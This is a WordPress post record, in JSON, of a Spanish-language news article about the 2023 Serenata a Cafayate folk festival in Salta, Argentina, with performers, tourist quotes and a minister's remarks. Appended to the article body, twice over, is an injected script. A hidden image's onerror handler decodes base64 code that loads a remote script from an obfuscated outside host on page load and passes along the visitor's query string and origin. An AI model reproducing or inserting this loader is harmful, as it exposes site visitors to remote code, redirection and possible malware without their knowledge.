{"id":2274,"date":"2023-02-26T23:43:13","date_gmt":"2023-02-27T02:43:13","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2274"},"modified":"2025-08-14T00:22:28","modified_gmt":"2025-08-14T03:22:28","slug":"musica-cultura-gastronomia-y-miles-de-turistas-que-disfrutan-la-serenata-a-cafayate","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2274","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/musica-cultura-gastronomia-y-miles-de-turistas-que-disfrutan-la-serenata-a-cafayate-88097\">M\u00fasica, cultura, gastronom\u00eda y miles de turistas que disfrutan la Serenata a Cafayate<\/a>"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#ab0c33\"><em>Turistas de casi toda Argentina y de pa\u00edses de la regi\u00f3n colmaron los Valles Calchaqu\u00edes para disfrutar del tradicional festival vallisto.<\/em><\/h3>\n\n\n\n<p>En los Valles Calchaqu\u00edes el folclore convoca a una importante cartelera y a un numeroso p\u00fablico, es la Serenata que desde hace m\u00e1s de 40 a\u00f1os al grito de Alegrate Cafayate invita a los duendes de la m\u00fasica y el canto que durante tres noches renuevan la magia de cada a\u00f1o en la Bodega Encantada.<\/p>\n\n\n\n<p>La noche inaugural cont\u00f3 con la presencia de miles de turistas que llegaron a Cafayate para disfrutar de su belleza y del canto y el baile que los artistas locales y del pa\u00eds ofrecen cada noche; en la del 23 deslumbraron con su arte L\u00e1zaro Caballero, el Indio Lucio Rojas, Los Izquierdos de la Cueva y muchos m\u00e1s.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5876-.jpg\" alt=\"\" width=\"249\" height=\"166\"\/><\/figure><\/div>\n\n\n<p>Desde el jueves y hasta el s\u00e1bado 25 disfrutando de los vinos, los paseos por los m\u00e9danos y los vi\u00f1edos quienes llegan a Cafayate comparten la Serenata y disfrutan de una cartelera de m\u00fasica y danza que este viernes incluye a Los Tekis, Franco Barrionuevo, Juan Fuentes, Micaela Chauque y Los Guitarreros, entre otros.<\/p>\n\n\n\n<p>Es de destacar que el \u00e1rea de Promoci\u00f3n del Ministerio de Turismo y Deportes de Salta se encuentra en Cafayate con un equipo encabezado por el ministro de Turismo y Deportes Mario Pe\u00f1a.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5877-.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Para esperar el amanecer del s\u00e1bado 25 la jornada contar\u00e1 con el Chaque\u00f1o Palavecino, Paola Arias, Canto 4, Jacinta Condor\u00ed, Alma Carpera, Las Voces de Or\u00e1n y Mariana Cay\u00f3n quienes junto a otros artistas dar\u00e1n por finalizada, con las primeras luces, la Serenata a Cafayate 2023.<\/p>\n\n\n\n<p>De Ingeniero Ju\u00e1rez, Formosa, lleg\u00f3 a la Serenata una familia que en la voz de Juan coment\u00f3: \u201cestoy muy emocionado de estar aqu\u00ed, es una experiencia escuchar el folclore en este lugar; estamos disfrutando mucho de Cafayate y de Salta\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5878-.jpg\" alt=\"\" width=\"228\" height=\"152\"\/><\/figure><\/div>\n\n\n<p>Por su parte, un grupo de j\u00f3venes arrib\u00f3 a la provincia desde Bolivia y manifestaron su alegr\u00eda de participar de este espect\u00e1culo; Anal\u00eda se refiri\u00f3 a la decisi\u00f3n de viajar: \u201chab\u00edamos escuchado hablar de la Serenata y este a\u00f1o nos decidimos, es maravilloso estar aqu\u00ed, Cafayate es hermoso y a la noche vivimos el folclore como si fu\u00e9ramos de aqu\u00ed\u201d.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Antonia y sus amigas visitan Salta desde C\u00f3rdoba capital: \u201cEs incre\u00edble lo que estamos viviendo, la m\u00fasica y la danza; la Serenata supera nuestras expectativas\u201d.<\/p>\n\n\n\n<p>La familia de Gustavo y Mariana lleg\u00f3 para vivir la Serenata desde Carlos Paz, C\u00f3rdoba: \u201cvinimos con un matrimonio amigo que es la segunda vez que viene, ellos nos entusiasmaron y estamos muy agradecidos, escuchar el folclore en este lugar es una hermosa experiencia\u201d.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5879-.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5879-.jpg\" alt=\".\" width=\"-311\" height=\"-207\"\/><\/a><\/figure><\/div>\n\n\n<p>&nbsp;\u201cEn Salta vivimos en el final de verano otro fin de semana colmado de turistas,&nbsp; en este caso con la Serenata a Cafayate que es uno de los festivales m\u00e1s importantes del pa\u00eds por todo lo que significa por el nivel art\u00edstico, la m\u00edstica de amanecer escuchando m\u00fasica, y por los valores que nos conocen en todo el mundo: nuestra gastronom\u00eda, la cultura y nuestra calidez de anfitri\u00f3n\u00bb, dijo el ministro Pe\u00f1a.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/musica-cultura-gastronomia-y-miles-de-turistas-que-disfrutan-la-serenata-a-cafayate-88097\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Turistas de casi toda Argentina y de pa\u00edses de la regi\u00f3n colmaron los Valles Calchaqu\u00edes para disfrutar del tradicional festival vallisto. En los Valles Calchaqu\u00edes el folclore convoca a una importante cartelera y a un numeroso p\u00fablico, es la Serenata que desde hace m\u00e1s de 40 a\u00f1os al grito de Alegrate Cafayate invita a los [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2275,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-2274","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2274"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2274"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2274\/revisions"}],"predecessor-version":[{"id":7164,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2274\/revisions\/7164"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2275"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2274"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}